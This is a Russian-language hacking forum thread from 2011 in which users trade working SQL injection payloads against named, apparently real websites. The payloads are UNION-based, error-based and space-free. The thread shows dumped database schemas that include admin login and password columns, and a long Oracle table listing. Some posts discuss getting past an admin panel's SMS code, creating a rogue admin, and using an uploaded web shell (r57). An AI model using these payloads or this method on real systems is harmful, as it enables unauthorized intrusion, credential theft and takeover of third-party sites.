http://www.riviera-crimea.com/detail.php?id=425+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+ (убираем минусили ковычку)
данные не выводятся
как узнать когда писать именно ковычку, минус и ковычку а когда просто ковычку


Ы, кавычку нужно писать, когда переменная имеет тип string. Чтобы выйти из значения переменной и дописать свой SQL запрос. А когда переменная типа integer - кавычка ни в коем случае не нужна! И еще нужно помнить, что когда переменная типа string мы всегда должны в конце ставить комментарий ( -- ), чтобы убрать лишнюю кавычку, которая осталась.

Seravin
22.07.2011, 11:22
heks said:
Мне бы расписать почему при
http://www.riviera-crimea.com/detail.php?id=-425'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+
данные выводятся
http://www.riviera-crimea.com/detail.php?id=425+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+ (убираем минусили ковычку)
данные не выводятся
как узнать когда писать именно ковычку, минус и ковычку а когда просто ковычку


ну в статьях как бы всё расписано(даже если не написано и ты не можешь понять, то наверно надо изучать не с этого)

1. Ковычка используется при запросах вида

"SELECT * FROM table WHERE param='".$_GET['param']."'"

ковычкой мы закрываем предыдущую ковычку.

Проверить просто:

http://www.riviera-crimea.com/detail.php?id=421+and+1=1 - отображает

http://www.riviera-crimea.com/detail.php?id=421+and+1=2 - отображает

значит мы не влияем на запрос, т. к. мы должны были получить пустой результат 421+and+1=2 (true and false = false)

"SELECT * FROM table WHERE param='421 and 1=2'"

2. С кавычкой

http://www.riviera-crimea.com/detail.php?id=421'+and+1=1--+ - отображает

http://www.riviera-crimea.com/detail.php?id=421'+and+1=2--+ - не отображает

значит запрос составлен верно

"SELECT * FROM table WHERE param='421' and 1=2--+'"

3. -421 это то вместо чего я использую 421 and 1=2(что как и -421 возвращает пустой запрос и можно вписать свой через union select)

Faaax
22.07.2011, 19:30
может кто помочь или нет?


Code:
http://www.maykoplat.ru/index.php?id=1' AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48 #

не могу даже название бд узнать

Melfis
22.07.2011, 22:19
Faaax said:
может кто помочь или нет?

Code:
http://www.maykoplat.ru/index.php?id=1' AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48 #

не могу даже название бд узнать


параметры(те что отсылаются при нажатии кнопки "оплата") для поста на корень сайта


Code:
action=pay&id=213123'+and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+'&email=a%40a.ru&submit_button=%CE%CF%CB%C0%D2%C0

юзается Error-based SQL-Injection, вместо version() подставлять (select 1) или (select group_concat(table_name) from information_schema.tables), ну и так далее

Expl0ited
22.07.2011, 22:36
Faaax said:
может кто помочь или нет?

Code:
http://www.maykoplat.ru/index.php?id=1' AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48 #

не могу даже название бд узнать


В чем собственно проблема? Вывод в исходнике:


Code:
www.maykoplat.ru/index.php?id=1'and(1=0)union+select(1),2,(select(@ x)from(select(@x:=0x00),(select(0)from(information _schema.columns)where(table_schema!=0x696e666f726d 6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x ,"\r\n",table_schema,0x2e,table_name,0x3a,column_name)))) x),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48--+'1



Code:
vsemayki_ru.admin_stat:id
vsemayki_ru.admin_stat:data
vsemayki_ru.admin_stat:name
vsemayki_ru.admin_user:ID
vsemayki_ru.admin_user:LOGIN
vsemayki_ru.admin_user:PASSWORD
vsemayki_ru.admin_user:NAME
vsemayki_ru.admin_user:EMAIL
vsemayki_ru.admin_user:ACTIVE
vsemayki_ru.admin_user:DATE_LAST
vsemayki_ru.admin_user:ISADMIN
vsemayki_ru.admin_user:IP
vsemayki_ru.admin_user:stage2
vsemayki_ru.admin_user:stage3
vsemayki_ru.admin_user:stage4
vsemayki_ru.admin_user:stage5
vsemayki_ru.admin_user:stage6
vsemayki_ru.admin_user:stage7
vsemayki_ru.admin_user:stage8
vsemayki_ru.admin_user:stage9
vsemayki_ru.admin_user:stage10
vsemayki_ru.admin_user:stage11
vsemayki_ru.admin_user:stage12
vsemayki_ru.admin_user:stage13
vsemayki_ru.admin_user:stage14
vsemayki_ru.admin_user:stage15
vsemayki_ru.admin_user:stage16
vsemayki_ru.admin_user:stage17
vsemayki_ru.admin_user:stage18
vsemayki_ru.admin_user:sklad
vsemayki_ru.admin_user:stage19
vsemayki_ru.admin_user:stages20
vsemayki_ru.admin_user:stages21
vsemayki_ru.admin_user:stages22
vsemayki_ru.admin_user:department
vsemayki_ru.admin_user:phone
vsemayki_ru.admin_user_login:admin_login_id
vsemayki_ru.admin_user_login:parent
vsemayki_ru.admin_user_login:datetime
vsemayki_ru.admin_user_login:ip
vsemayki_ru.admin_user_login:type
vsemayki_ru.admin_user_login:succes
vsemayki_ru.admin_user_parts:ID
vsemayki_ru.admin_user_parts:admin_user
vsemayki_ru.admin_user_parts:module
vsemayki_ru.admin_user_parts:module_key
vsemayki_ru.admin_user_parts:iswrite

547
23.07.2011, 00:04
http://www.gagauzia.md/search.php

sql в поиске, реально раскрутить?

Expl0ited
23.07.2011, 00:33
547 said:
покажи как крутить такую скуль...




Code:
'and(1=0)union(select(1),2,3,4,(select(@x)from(sel ect(@x:=0x00),(select(0)from(information_schema.co lumns)where(table_schema!=0x696e666f726d6174696f6e 5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723 e,table_schema,0x2e,table_name,0x3a,column_name))) )x),6)#

Учи синтаксис запросов!

FlaktW
23.07.2011, 00:59
Expl0ited said:

Code:
'and(1=0)union(select(1),2,3,4,(select(@x)from(sel ect(@x:=0x00),(select(0)from(information_schema.co lumns)where(table_schema!=0x696e666f726d6174696f6e 5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723 e,table_schema,0x2e,table_name,0x3a,column_name))) )x),6)#



Каким запросом подобрано кол-во полей допишите, пожалуйста ?

Так не получается :

'order(by(6))#

Expl0ited
23.07.2011, 01:03
FlaktW said:
Каким запросом подобрано кол-во полей допишите, пожалуйста
Так не получается :
'order(by(6))#


Логику запроса посмотри, там и без order by легко можно обойтись, а даже если и использовать то конструкция которую ты привел не допустима, на вышеупомянутом сайте идет разделение слов по пробелу и осуществляется поиск по словам, а значит нам нужно составить запрос без пробелов, вариантов много, я предпочел бы order/**/by(NUM)

vaddd
23.07.2011, 03:08
http://opulent-style.com/view_item.php?id=1+and+substring%28%28SELECT%202%2 9,1,1%29=1

реально ли такую инъекцию не как слепую крутить?

http://opulent-style.com/view_item.php?id=1%20order%20by%202

Unknown column '2' in 'order clause'

XAMEHA
23.07.2011, 08:20
vaddd said:
http://opulent-style.com/view_item.php?id=1+and+substring%28%28SELECT%202%2 9,1,1%29=1
реально ли такую инъекцию не как слепую крутить?
http://opulent-style.com/view_item.php?id=1%20order%20by%202
Unknown column '2' in 'order clause'


SELECT Вложеный в UPDATE. Этот вариант во много раз удобнее обычной инъекции. Вывести информацию можно через ошибку, а при надобности даже заменить её на свою(Добавить пользователя, редактировать новость).

vaddd
23.07.2011, 20:33
XAMEHA said:
SELECT Вложеный в UPDATE. Этот вариант во много раз удобнее обычной инъекции. Вывести информацию можно через ошибку, а при надобности даже заменить её на свою(Добавить пользователя, редактировать новость).


не могли бы вы показать пример использования?


http://www.opulent-style.com/view_item.php?id=1 order by 1


выполняется UPDATE с ошибкой


http://www.opulent-style.com/view_item.php?id=1 order by 2


выполняется SELECT...

winstrool
23.07.2011, 21:17
вот пример синтаксиса как можно использовать UPDATE но естественно тебе надо знать какие есть таблици для формирования правельного запроса...


UPDATE `phpclass_category` SET `cat_id` = '5' , `cat_name` = '[твой код]' WHERE cat_id=5 LIMIT 1;


и логично что кавычки не должны фильтроваться и слешироваться. а они там слешируются _http://www.opulent-style.com/view_item.php?id=1%27

Cherep
24.07.2011, 01:06
залил шелл на форум. Когда уже иду по линку шела, он какбы грузится, но вместо файлов ничего нету. Вот пример

http://pikucha.ru/i5KrG

sevenup
24.07.2011, 01:53
Cherep said:
залил шелл на форум. Когда уже иду по линку шела, он какбы грузится, но вместо файлов ничего нету. Вот пример
http://pikucha.ru/i5KrG


залей r57 и будешь видеть файлы...или пользуйся консолью для просмотра файлов

ZARO
24.07.2011, 12:32
winstrool said:
вот пример синтаксиса как можно использовать UPDATE но естественно тебе надо знать какие есть таблици для формирования правельного запроса...
и логично что кавычки не должны фильтроваться и слешироваться. а они там слешируются _http://www.opulent-style.com/view_item.php?id=1%27


Почему обязательно? Можно перевести значения переменных в hex...

А так, можно крутить через error based.

http://www.opulent-style.com/view_item.php?id=1%20or%20(select%20count(*)from(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(mid((select%20version()) ,1,64),floor(rand(0)*2)))

Faaax
24.07.2011, 16:35
Expl0ited said:
В чем собственно проблема? Вывод в исходнике:

Code:
www.maykoplat.ru/index.php?id=1'and(1=0)union+select(1),2,(select(@ x)from(select(@x:=0x00),(select(0)from(information _schema.columns)where(table_schema!=0x696e666f726d 6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x ,"\r\n",table_schema,0x2e,table_name,0x3a,column_name)))) x),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48--+'1


Code:
vsemayki_ru.admin_stat:id
vsemayki_ru.admin_stat:data
vsemayki_ru.admin_stat:name
vsemayki_ru.admin_user:ID
vsemayki_ru.admin_user:LOGIN
vsemayki_ru.admin_user:PASSWORD
vsemayki_ru.admin_user:NAME
vsemayki_ru.admin_user:EMAIL
vsemayki_ru.admin_user:ACTIVE
vsemayki_ru.admin_user:DATE_LAST
vsemayki_ru.admin_user:ISADMIN
vsemayki_ru.admin_user:IP
vsemayki_ru.admin_user:stage2
vsemayki_ru.admin_user:stage3
vsemayki_ru.admin_user:stage4
vsemayki_ru.admin_user:stage5
vsemayki_ru.admin_user:stage6
vsemayki_ru.admin_user:stage7
vsemayki_ru.admin_user:stage8
vsemayki_ru.admin_user:stage9
vsemayki_ru.admin_user:stage10
vsemayki_ru.admin_user:stage11
vsemayki_ru.admin_user:stage12
vsemayki_ru.admin_user:stage13
vsemayki_ru.admin_user:stage14
vsemayki_ru.admin_user:stage15
vsemayki_ru.admin_user:stage16
vsemayki_ru.admin_user:stage17
vsemayki_ru.admin_user:stage18
vsemayki_ru.admin_user:sklad
vsemayki_ru.admin_user:stage19
vsemayki_ru.admin_user:stages20
vsemayki_ru.admin_user:stages21
vsemayki_ru.admin_user:stages22
vsemayki_ru.admin_user:department
vsemayki_ru.admin_user:phone
vsemayki_ru.admin_user_login:admin_login_id
vsemayki_ru.admin_user_login:parent
vsemayki_ru.admin_user_login:datetime
vsemayki_ru.admin_user_login:ip
vsemayki_ru.admin_user_login:type
vsemayki_ru.admin_user_login:succes
vsemayki_ru.admin_user_parts:ID
vsemayki_ru.admin_user_parts:admin_user
vsemayki_ru.admin_user_parts:module
vsemayki_ru.admin_user_parts:module_key
vsemayki_ru.admin_user_parts:iswrite



спс,всё уже узнал!

Но теперь препятствует ещё одна проблема как захожу в админку ввожу логин и пасс,но ещё требует какойто временный код,всю бд пересмотрел временных кодов там нет!помогите кто нито)))

или можно создать запросом как то нового админа или ещё как?

попугай
24.07.2011, 16:57
Faaax said:
спс,всё уже узнал!
Но теперь препятствует ещё одна проблема как захожу в админку ввожу логин и пасс,но ещё требует какойто временный код,всю бд пересмотрел временных кодов там нет!помогите кто нито)))
или можно создать запросом как то нового админа или ещё как?


там временный код через смс пересылается на телефон. Однако, на одном из сайтов на этом сервере есть админка, где код не нужен.

exmicru
24.07.2011, 21:20
mysql 5.1.57

id=0'+union+select+1,2,3,4,5+--+

Скуля, название таблиц получил, а колонки не выводит.

И

id=0'+union+select+1,2,3,4,5+from+users+--+

Не выводит, как будто таблиц не существует.

В чём может быть проблема?

Expl0ited
24.07.2011, 21:23
exmicru said:
mysql 5.1.57
id=0'+union+select+1,2,3,4,5+--+
Скуля, название таблиц получил, а колонки не выводит.
И
id=0'+union+select+1,2,3,4,5+from+users+--+
Не выводит, как будто таблиц не существует.
В чём может быть проблема?


id=0'+union+select+column_name+from+db_name.table_ name--+

ZARO
24.07.2011, 21:37
exmicru said:
mysql 5.1.57
id=0'+union+select+1,2,3,4,5+--+
Скуля, название таблиц получил, а колонки не выводит.
И
id=0'+union+select+1,2,3,4,5+from+users+--+
Не выводит, как будто таблиц не существует.
В чём может быть проблема?


Сперва узнай в какой базе находится табла. Select table_schema from information_schema.tables where table_name=%table_name%

fl00der
25.07.2011, 00:49
Помогите раскрутить, пожалуйста

www.ca[G00GLE]ndy.ru/detail.asp?PrId=690+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13+FROM+sys.dual​Могу подарить SSH

FlaktW
25.07.2011, 01:17
fl00der said:
Помогите раскрутить, пожалуйста
www.ca[G00GLE]ndy.ru/detail.asp?PrId=690+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13+FROM+sys.dual

Могу подарить SSH


Как-то так:

DB Name: DBGP1

Table found: OL$

Table found: OL$HINTS

Table found: OL$NODES

Table found: SRS$

Table found: MGMT_SNAPSHOT

Table found: MGMT_SNAPSHOT_SQL

Table found: MGMT_BASELINE

Table found: MGMT_BASELINE_SQL

Table found: MGMT_CAPTURE

Table found: MGMT_CAPTURE_SQL

Table found: MGMT_RESPONSE_CONFIG

Table found: MGMT_LATEST

Table found: MGMT_LATEST_SQL

Table found: MGMT_HISTORY

Table found: MGMT_HISTORY_SQL

Table found: MGMT_BSLN_DATASOURCES

Table found: MGMT_BSLN_BASELINES

Table found: MGMT_BSLN_INTERVALS

Table found: MGMT_BSLN_METRICS

Table found: MGMT_BSLN_STATISTICS

Table found: MGMT_BSLN_THRESHOLD_PARMS

Table found: EXF$VERSION

Table found: EXF$PARAMETER

Table found: EXF$DEFIDXPARAM

Table found: EXF$ESETIDXPARAM

Table found: SYS_IOT_OVER_40438

Table found: EXF$PREDATTRMAP

Table found: EXF$VALIDIOPER

Table found: EXF$VALIDPRIVS

Table found: EXF$PLAN_TABLE

Table found: DM$P_MODEL

Table found: DM$P_MODEL_TABLES

Table found: XDB$ROOT_INFO

Table found: XDB$H_INDEX

Table found: XDB$COLUMN_INFO

Table found: XDB$PATH_INDEX_PARAMS

Table found: XDB$NMSPC_ID

Table found: XDB$QNAME_ID

Table found: XDB$PATH_ID

Table found: XDB$CHECKOUTS

Table found: XDB$DXPTAB

Table found: XDB$DXPATH

Table found: MIGR9202STATUS

Table found: SYS_IOT_OVER_42474

Table found: SYS_IOT_OVER_42481

Table found: SYS_IOT_OVER_42488

Table found: SYS_IOT_OVER_42491

Table found: RLM$SCHACTLIST

Table found: SYS_IOT_OVER_42510

Table found: SYS_IOT_OVER_42513

Table found: SYS_IOT_OVER_42516

Table found: SYS_IOT_OVER_42519

Table found: SI_IMAGE_FORMATS_TAB

Table found: SI_FEATURES_TAB

Table found: SI_VALUES_TAB

Table found: ORD_CARTRIDGE_COMPONENTS

Table found: MGMT_NOTIFY_QTABLE

Table found: AQ$_MGMT_NOTIFY_QTABLE_S

Table found: SYS_IOT_OVER_49865

Table found: MGMT_VERSIONS

Table found: MGMT_TABLE_SIZES

Table found: MGMT_INDEX_SIZES

Table found: MGMT_REBUILD_INDEXES

Table found: MGMT_LICENSES

Table found: MGMT_AVAILABILITY

Table found: MGMT_CURRENT_AVAILABILITY

Table found: MGMT_AVAILABILITY_MARKER

Table found: MGMT_MASTER_AGENT

Table found: MGMT_MASTER_CHANGED_CALLBACK

Table found: MGMT_TARGET_BASELINES

Table found: MGMT_TARGET_BASELINES_DATA

Table found: MGMT_METRICS

Table found: MGMT_METRICS_EXT

Table found: MGMT_TARGET_TYPES

Table found: MGMT_TARGETS

Table found: MGMT_TYPE_PROPERTIES

Table found: MGMT_TARGET_PROP_DEFS

Table found: MGMT_TARGET_PROPERTIES

Table found: MGMT_TARGET_AGENT_ASSOC

Table found: SYS_IOT_OVER_49969

Table found: SYS_IOT_OVER_49972

Table found: MGMT_STRING_METRIC_HISTORY

Table found: MGMT_LONG_TEXT

Table found: MGMT_METRICS_COMPOSITE_KEYS

Table found: MGMT_TARGETS_DELETE

Table found: MGMT_TARGET_ADD_CALLBACKS

Table found: MGMT_TARGET_DELETE_CALLBACKS

Table found: MGMT_TARGET_DELETE_EXCEPTIONS

Table found: MGMT_DUPLICATE_TARGETS

Table found: MGMT_CHANGE_AGENT_URL

Table found: MGMT_TARGET_ROLLUP_TIMES

Table found: MGMT_METRIC_ERRORS

Table found: MGMT_CURRENT_METRIC_ERRORS

Table found: MGMT_TARGET_ASSOC

Table found: MGMT_TARGET_ASSOC_INSTANCE

Table found: MGMT_ANNOTATION

Table found: MGMT_METADATA_SETS

Table found: MGMT_CALLBACKS

Table found: MGMT_BCN_TARGET

Table found: MGMT_BCN_AVAIL_DEF

Table found: MGMT_BCN_AVAIL_JOB

Table found: MGMT_BCN_TXN_DEFN

Table found: MGMT_BCN_TXN_HTTP

Table found: MGMT_BCN_TXN_HTTP_PARAM

Table found: MGMT_BCN_TXN_PING

Table found: MGMT_BCN_TARGET_TXN

Table found: MGMT_BCN_TARGET_LOCK

Table found: MGMT_ADMIN_METRIC_THRESHOLDS

Table found: MGMT_BCN_AVAIL_LOG

Table found: MGMT_E2E_SUMMARY

Table found: MGMT_E2E_DETAILS

Table found: MGMT_E2E_SQL

Table found: MGMT_E2E_JDBC

Table found: MGMT_E2E_SQL_STMT

Table found: MGMT_E2E_SQL_CONN

Table found: MGMT_E2E_SUMMARY_1HOUR

Table found: MGMT_E2E_SUMMARY_1DAY

Table found: MGMT_E2E_DETAILS_1HOUR

Table found: MGMT_E2E_DETAILS_1DAY

Table found: MGMT_E2E_SQL_1HOUR

Table found: MGMT_E2E_SQL_1DAY

Table found: MGMT_E2E_JDBC_1HOUR

Table found: MGMT_E2E_JDBC_1DAY

Table found: MGMT_BLACKOUT_SCHEDULE

Table found: MGMT_BLACKOUTS

Table found: MGMT_BLACKOUT_TARGET_DETAILS

Table found: MGMT_BLACKOUT_FLAT_TARGETS

Table found: MGMT_BLACKOUT_REASON

Table found: MGMT_BLACKOUT_HISTORY

Table found: MGMT_BLACKOUT_STATE

Table found: MGMT_BLACKOUT_PROXY_TARGETS

Table found: MGMT_METRIC_COLLECTIONS

Table found: MGMT_METRIC_COLLECTIONS_REP

Table found: MGMT_COLLECTION_PROPERTIES

Table found: MGMT_METRIC_THRESHOLDS

Table found: MGMT_PARAMETERS

Table found: MGMT_OMS_PARAMETERS

Table found: MGMT_CREDENTIALS

Table found: MGMT_CREDENTIAL_TYPES

Table found: MGMT_CREDENTIAL_TYPE_COLUMNS

Table found: MGMT_CREDENTIAL_TYPE_COL_VALS

Table found: MGMT_CREDENTIAL_SETS

Table found: MGMT_CREDENTIAL_SET_COLUMNS

Table found: MGMT_CREDENTIALS2

Table found: MGMT_ARU_CREDENTIALS

Table found: MGMT_VIEW_USER_CREDENTIALS

Table found: MGMT_EMCRYPTO_SEED

Table found: MGMT_UPDATE_OPERATIONS

Table found: MGMT_UPDATE_OPERATIONS_DATA

Table found: MGMT_UPDATE_OPERATIONS_DETAILS

Table found: MGMT_UPDATE_THRESHOLDS_DATA

Table found: MGMT_UPDATE_PROPERTIES_DATA

Table found: MGMT_UPDATE_CREDENTIALS_DATA

Table found: MGMT_ECM_PATCH_CACHE

Table found: MGMT_ECM_ARU_MAP

Table found: MGMT_ECM_SNAPSHOT

Table found: MGMT_ECM_SNAP_COMPONENT_INFO

Table found: MGMT_ECM_GEN_SNAPSHOT

Table found: MGMT_ECM_SNAPSHOT_METADATA

Table found: MGMT_ECM_SNAPSHOT_MD_TABLES

Table found: MGMT_ECM_SNAPSHOT_MD_COLUMNS

Table found: MGMT_ECM_LOADED_FILES

Table found: MGMT_INV_CONTAINER

Table found: MGMT_INV_CONTAINER_PROPERTY

Table found: MGMT_INV_COMPONENT

Table found: MGMT_INV_DEPENDENCY_RULE

Table found: MGMT_INV_PATCHSET

Table found: MGMT_INV_VERSIONED_PATCH

Table found: MGMT_INV_PATCH

Table found: MGMT_INV_COMPONENT_PATCH

Table found: MGMT_INV_PATCH_FIXED_BUG

Table found: MGMT_INV_FILE

Table found: MGMT_INV_PATCHED_FILE

Table found: MGMT_INV_PATCHED_FILE_COMP

Table found: MGMT_TARGET_TYPE_COMPONENT_MAP

Table found: MGMT_ECM_HOST_CONFIGS_TO_DEL

Table found: MGMT_ARU_PRODUCTS

Table found: MGMT_ARU_PLATFORMS

Table found: MGMT_ARU_RELEASES

Table found: MGMT_ARU_LANGUAGES

Table found: MGMT_ARU_FAMILY_PRODUCT_MAP

Table found: MGMT_ARU_PRODUCT_RELEASE_MAP

Table found: MGMT_ARU_OUI_COMPONENTS

Table found: MGMT_BUG_ADVISORY

Table found: MGMT_BUG_ADVISORY_BUG

Table found: MGMT_BUG_AVAILABLE_PATCH

Table found: MGMT_BUG_PATCH_PLATFORM

Table found: MGMT_BUG_PATCH_FIXES_BUG

Table found: MGMT_BUG_FIX_APPLIC_COMP_LIST

Table found: MGMT_BUG_FIX_APPLICABLE_COMP

Table found: MGMT_BUG_ADV_HOME_PATCH

Table found: MGMT_DELTA_IDS

Table found: MGMT_DELTA_ENTRY

Table found: MGMT_DELTA_ENTRY_VALUES

Table found: MGMT_DELTA_ID_VALUES

Table found: MGMT_DELTA_SNAP

Table found: MGMT_HC_SYSTEM_SUMMARY

Table found: MGMT_HC_HARDWARE_MASTER

Table found: MGMT_HC_CPU_DETAILS

Table found: MGMT_HC_IOCARD_DETAILS

Table found: MGMT_HC_NIC_DETAILS

Table found: MGMT_HC_OS_SUMMARY

Table found: MGMT_HC_OS_PROPERTIES

Table found: MGMT_HC_OS_COMPONENTS

Table found: MGMT_HC_FS_MOUNT_DETAILS

Table found: MGMT_HC_VENDOR_SW_SUMMARY

Table found: MGMT_HC_VENDOR_SW_COMPONENTS

Table found: MGMT_ECM_RESOURCES

Table found: MGMT_DELTA_SAVED_COMPARISON

Table found: MGMT_DELTA_COMP_SUMMARIES

Table found: MGMT_DELTA_SUMMARY_ERRORS

Table found: MGMT_DELTA_COMPARISON_DELTAS

Table found: MGMT_DELTA_COMP_KEY_COLS

Table found: MGMT_DELTA_COMP_DELTA_DETAILS

Table found: MGMT_DELTA_COMP_PROPERTIES

Table found: MGMT_POLICY_RULE

Table found: MGMT_POLICY_RULE_DEF_COLUMNS

Table found: MGMT_POLICY_RULE_DEF_PARAMS

Table found: MGMT_POLICY_GROUP

Table found: MGMT_POLICY_PARAMS

Table found: MGMT_POLICY_RULE_CRITERIA

Table found: MGMT_POLICY_TARGET_CRITERIA

Table found: MGMT_POLICY_VIOLATIONS

Table found: MGMT_POLICY_VIOLATION_ROWS

Table found: MGMT_POLICY_VIOLATION_VALUES

Table found: MGMT_POLICY_SNAPSHOT_CRITERIA

Table found: MGMT_POLICY_ERRORS

Table found: MGMT_COMP_RESULT_TO_JOB_MAP

Table found: MGMT_ECM_CSA_SNAPSHOT_INFO

Table found: MGMT_ECM_CSA_GENERAL_INFO

Table found: MGMT_ECM_CSA

Table found: MGMT_ECM_CSA_COOKIES

Table found: MGMT_ECM_CSA_CUSTOM

Table found: MGMT_ECM_HW

Table found: MGMT_ECM_HW_CPU

Table found: MGMT_ECM_HW_IOCARD

Table found: MGMT_ECM_HW_NIC

Table found: MGMT_ECM_OS

Table found: MGMT_ECM_OS_PROPERTY

Table found: MGMT_ECM_OS_COMPONENT

Table found: MGMT_ECM_OS_FILESYSTEM

Table found: MGMT_ECM_OS_REGISTERED_SW

Table found: MGMT_ECM_OS_REGISTERED_SW_COMP

Table found: MGMT_FAILOVER_TABLE

Table found: MGMT_FAILOVER_CALLBACKS

Table found: MGMT_TARGET_MEMBERSHIPS

Table found: MGMT_FLAT_TARGET_MEMBERSHIPS

Table found: MGMT_COMP_TARGET_DEF

Table found: MGMT_JOB_COMMAND

Table found: MGMT_JOB_TYPE_INFO

Table found: MGMT_JOB_SINGLE_TARGET_TYPES

Table found: MGMT_JOB_EXECPLAN

Table found: MGMT_JOB_STEP_PARAMS

Table found: MGMT_JOB_NESTED_JOB_TARGETS

Table found: MGMT_JOB_PARAM_SOURCE

Table found: MGMT_JOB_USER_PARAMS

Table found: MGMT_JOB_SQL_PARAMS

Table found: MGMT_JOB_CRED_PARAMS

Table found: MGMT_JOB_SUBST_PARAMS

Table found: MGMT_JOB_PROP_PARAMS

Table found: MGMT_JOB_VALUE_PARAMS

Table found: MGMT_JOB_SEC_INFO

Table found: MGMT_JOB_LOCK_INFO

Table found: MGMT_JOB_LOCK_TARGETS

Table found: MGMT_JOB_SCHEDULE

Table found: MGMT_JOB

Table found: MGMT_JOB_TARGET

Table found: MGMT_JOB_FLAT_TARGETS

Table found: MGMT_JOB_EXT_TARGETS

Table found: MGMT_JOB_OUTPUT

Table found: MGMT_JOB_LARGE_PARAMS

Table found: MGMT_JOB_EXEC_SUMMARY

Table found: MGMT_JOB_EXEC_EVENT_PARAMS

Table found: MGMT_JOB_EXEC_LOCKS

Table found: MGMT_JOB_PARAMETER

Table found: MGMT_JOB_HISTORY

Table found: MGMT_JOB_EXECUTION

Table found: MGMT_JOB_STEP_COMMAND_LOG

Table found: MGMT_JOB_EMD_STATUS_QUEUE

Table found: MGMT_JOB_PURGE_POLICIES

Table found: MGMT_JOB_PURGE_CRITERIA

Table found: MGMT_JOB_PURGE_TARGETS

Table found: MGMT_JOB_PURGE_VALUES

Table found: MGMT_JOB_EVENT

Table found: MGMT_JOB_TYPE_URI_INFO

Table found: MGMT_JOB_TYPE_DISPLAY_PARAM

Table found: MGMT_JOB_TYPE_DISPLAY_INFO

Table found: MGMT_JOB_STEP_TARGETS

Table found: MGMT_JOB_CALLBACKS

Table found: MGMT_JOB_QUEUES

Table found: MGMT_JOB_BLACKOUT_ASSOC

Table found: MGMT_PERFORMANCE_NAMES

Table found: MGMT_SYSTEM_ERROR_LOG

Table found: MGMT_SYSTEM_PERFORMANCE_LOG

Table found: MGMT_METRIC_DEPENDENCY_DEF

Table found: MGMT_METRIC_DEPENDENCY

Table found: MGMT_METRIC_DEPENDENCY_DETAILS

Table found: MGMT_NOTIFY_EMAIL_GATEWAY

Table found: MGMT_NOTIFY_PROFILES

Table found: MGMT_NOTIFY_DEVICES

Table found: MGMT_NOTIFY_DEVICE_PARAMS

Table found: MGMT_NOTIFY_SCHEDULES

Table found: MGMT_NOTIFY_DEV_SCHEDULES

Table found: MGMT_NOTIFY_RULES

Table found: MGMT_NOTIFY_RULE_CONFIGS

Table found: MGMT_NOTIFY_REQUEUE

Table found: MGMT_NOTIFY_QUEUES

Table found: MGMT_NOTIFICATION_LOG

Table found: MGMT_EMD_PING

Table found: MGMT_USER_TYPE_METRIC_PREFS

Table found: MGMT_USER_FOLDERS

Table found: MGMT_USER_PREFERENCES

Table found: MGMT_PORTLET_PREFERENCE_STORE

Table found: MGMT_PURGE_POLICY

Table found: MGMT_PURGE_POLICY_GROUP

Table found: MGMT_PURGE_POLICY_TARGET_STATE

Table found: MGMT_SEC_INFO

Table found: MGMT_AGENT_SEC_INFO

Table found: EM_IPW_INFO

Table found: MGMT_SEVERITY

Table found: MGMT_CURRENT_SEVERITY

Table found: MGMT_PRIVS

Table found: MGMT_ROLES

Table found: MGMT_FLAT_ROLE_GRANTS

Table found: MGMT_USER_CONTEXT

Table found: MGMT_USER_CALLBACKS

Table found: MGMT_CREATED_USERS

Table found: MGMT_LOGIN_ASSISTANTS

Table found: MGMT_LICENSE_DEFINITIONS

Table found: MGMT_HA_BACKUP

Table found: MGMT_HA_MTTR

Table found: MGMT_DB_DBNINSTANCEINFO_ECM

Table found: MGMT_DB_CONTROLFILES_ECM

Table found: MGMT_DB_REDOLOGS_ECM

Table found: MGMT_DB_ROLLBACK_SEGS_ECM

Table found: MGMT_DB_SGA_ECM

Table found: MGMT_DB_LICENSE_ECM

Table found: MGMT_DB_TABLESPACES_ECM

Table found: MGMT_DB_DATAFILES_ECM

Table found: MGMT_HA_INFO_ECM

Table found: MGMT_HA_INIT_PARAMS_ECM

Table found: MGMT_HA_FILES_ECM

Table found: MGMT_HA_RMAN_CONFIG_ECM

Table found: MGMT_DB_FEATUREUSAGE

Table found: MGMT_SQL_EVALUATION

Table found: MGMT_SQL_BIND_VARS

Table found: MGMT_SQLPROBLEM_FACTORS

Table found: MGMT_PLANPROBLEM_FACTORS

Table found: MGMT_SQL_REUSE

Table found: MGMT_SQL_SUMMARY

Table found: MGMT_SQL_PLAN

Table found: MGMT_SQL_METRIC_HELPER

Table found: MGMT_BACKUP_CONFIGURATION

Table found: MGMT_RCVCAT_CONFIG

Table found: MGMT_RCVCAT_REPOS

Table found: MGMT_DBNET_TNS_ADMINS

Table found: MGMT_DB_LATEST_HDM_FINDINGS

Table found: MGMT_DB_HDM_METRIC_HELPER

Table found: MGMT_SPACE_METRICS

